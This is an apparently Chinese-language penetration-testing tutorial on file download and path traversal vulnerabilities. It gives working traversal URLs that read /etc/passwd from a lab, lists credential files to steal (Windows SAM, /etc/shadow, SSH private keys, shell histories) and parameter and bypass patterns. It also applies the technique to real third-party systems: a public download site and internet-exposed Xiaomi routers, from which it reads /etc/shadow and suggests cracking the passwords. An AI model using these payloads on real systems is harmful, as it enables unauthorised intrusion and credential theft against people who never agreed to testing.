WEB漏洞-文件操作之文件下载读取全解

QQ截图20220210094822.jpg

文件下载读取漏洞利用

进入靶场,点击图片会下载文件,看到参数file中的文件被下载,根据相对路径猜测,就可以下载当前的php脚本

QQ截图20220210095511.jpg

尝试使用../来测试php脚本位置

  • http://192.168.50.10:82/vul/unsafedownload/execdownload.php?filename=../execdownload.php

QQ截图20220210100109.jpg

利用目录扫描工具进行扫描,最好能获取到各种配置文件,这样就可以直接获取到数据库或者其他资源的密码

QQ截图20220210100229.jpg

然后可以利用这个漏洞下载文件并分析网站目录下的文件,分析源码再尝试渗透

  • http://192.168.50.10:82/vul/unsafedownload/execdownload.php?filename=../../../index.php
  • http://192.168.50.10:82/vul/unsafedownload/execdownload.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd
  • http://192.168.50.10:82/vul/unsafedownload/execdownload.php?filename=../../../../../../../../../../../../../../../../../../etc/hosts

QQ截图20220210100351.jpg

QQ截图20220210100725.jpg

QQ截图20220210100730.jpg

网站目录的获取

  • 通过扫描工具爬行或者扫码地址
  • 通过URL报错查看(几率小)
  • 通过下载传参的脚步文件,去发现代码里面出现的文件路径,以及包含文件获取(这里为:execdownload.php)
  • 数据库配置文件下载或读取后续

下载数据库,操作系统配置文件

Windows

  • C:\boot.ini : 查看系统版本
  • C:\Windows\System32\inetsrv\MetaBase.xml : IIS 配置文件
  • C:\Windows\repair\sam : 存储系统初次安装的密码
  • C:\Program Files\mysql\my.ini : Mysql 配置
  • C:\Program Files\mysql\data\mysql\user.MYD : Mysql root
  • C:\Windows\php.ini : php 配置信息
  • C:\Windows\my.ini : Mysql 配置信息
  • C:\Windows\win.ini : Windows 系统的一个基本系统配置文件

Linux

  • /root/.ssh/authorized_keys : ssh公钥记录
  • /root/.ssh/id_rsa : ssh密钥文件
  • /root/.ssh/id_ras.keystore : ssh密钥文件
  • /root/.ssh/known_hosts : 记录每个访问计算机用户的公钥
  • /etc/passwd : 所有用户
  • /etc/shadow : 用户密码文件
  • /usr/local/app/php5/lib/php.ini : PHP 配置文件
  • /etc/my.cnf : mysql 配置文件
  • /etc/httpd/conf/httpd.conf : apache 配置文件
  • /root/.bash_history : 用户历史命令记录文件
  • /root/.mysql_history : mysql 历史命令记录文件
  • /proc/mounts : 记录系统挂载设备
  • /porc/config.gz : 内核配置文件
  • /var/lib/mlocate/mlocate.db : 全文件路径
  • /porc/self/cmdline : 当前进程的 cmdline 参数

文件下载漏洞可能出现的URL特点

文件名

  • read.xxx?filename=
  • down.xxx?filename=
  • readfile.xxx?file=
  • downfile.xxx?file=

参数值

  • ../,..\,.\,./
  • %00,?,%23,%20,.
  • &readpath=,&filepath=,&path=,&inputfile=,&url=,&data=,&readfile=,&menu=,META-INF=,WEB-INF

znds文件下载真实测试

QQ截图20220210102002.jpg

  • 分析下载地址,可以根据该地址尝试渗透
#链接地址
http://down.znds.com/getdownurl/?s=L2Rvd24vMjAyMTExMTcveXN0XzEuNC41X2RhbmdiZWkuYXBr
#base64解密
/down/20211117/yst_1.4.5_dangbei.apk
#实际跳转下载地址
http://115.223.7.63/app.znds.com/down/20220125/mgtvDBEI_6.0.902_dangbei.apk

小米路由器-文件读取真实测试-漏洞

QQ截图20220210105545.jpg

使用黑暗引擎搜索使用小米路由器的用户

QQ截图20220210105609.jpg

测试读取/etc/shadow密码文件

  • http://*.*.*.*/api-third-party/download/extdisks../etc/shadow

QQ截图20220210105655.jpg

查看文件,可以尝试进行密码爆破

QQ截图20220210105739.jpg